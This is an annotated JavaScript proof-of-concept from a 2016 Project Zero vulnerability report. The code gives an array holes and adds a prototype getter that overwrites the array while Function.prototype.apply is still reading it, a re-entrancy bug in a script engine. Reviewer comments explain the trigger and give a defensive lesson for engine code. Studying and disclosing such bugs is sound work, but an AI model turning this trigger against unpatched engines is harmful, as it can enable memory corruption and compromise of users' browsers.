- Report: Aug 2016
- Fix: Oct 2016
- Credit: Natalie Silvanovich, Google Project Zero
// Array under test: three own elements at indices 0-2. Its length is raised to 20
// further down, and it is later passed as the argument array of f.apply().
var t = new Array(1,2,3);
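/**
 * Callee used by the test case: converts every argument it receives to a
 * hexadecimal string and collects the strings in a local array.
 *
 * Takes any number of arguments (read through `arguments`). Returns nothing:
 * the collected array is discarded, because the only consumer, the alert()
 * call, is commented out.
 */
function f(){
  var h = [];
  // Copy the arguments object into a real array (kept in the original spread form).
  var a = [...arguments];
  // `item` is declared here. The original assigned to an undeclared name, which
  // creates a global in sloppy mode and throws a ReferenceError in strict mode
  // and in ES modules.
  for (var item in a) {
    var n = new Number(a[item]);
    if (n < 0) {
      // Add 2^32 to negative values so that a negative 32-bit integer is
      // printed in its unsigned form.
      n = n + 0x100000000;
    }
    h.push(n.toString(16));
  }
  // Display of the collected values stays disabled, as in the original.
  //alert(h);
}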
// Second reference to f; not used again in the visible listing.
var q = f;
// Raise t's length to 20 without adding elements: indices 3..19 are holes with
// no own property, so a read of any of them falls through to the prototype chain.
t.length = 20;
var o = {};
// Getter-only accessor for index '3' on the object that becomes t's prototype.
// Because t has no own element at 3, reading t[3] runs this getter.
Object.defineProperty(o, '3', {
get: function() {
var ta = [];
// Side effect during the read: Array.prototype.fill is invoked on t with the
// string "natalie", so t's elements are overwritten (numbers replaced by a
// string) while the reader that triggered the getter is still part-way through t.
// NOTE(review): per the language spec the write to index 3 should reach this
// setter-less accessor and throw; how far the fill gets may differ by engine, so confirm.
ta.fill.call(t, "natalie");
return 5;
}
});
// Swap t's prototype from Array.prototype to o so the hole at index 3 resolves to the getter.
t.__proto__ = o;
// Unused in the visible listing.
var j = [];
// apply() must read t's elements to build the argument list for f; reading index 3
// runs the getter above, which modifies t in the middle of that read.
// NOTE(review): presumably this re-entrancy is what the report covers. The page
// names no engine, component or issue id, so confirm against the original report.
// Defensive takeaway for engine code: re-validate an array's length, element kind
// and backing storage after any step that can run script (getters, proxies,
// valueOf/toString) instead of caching them across that step.
// s is not read afterwards in the visible listing.
var s = f.apply(null, t);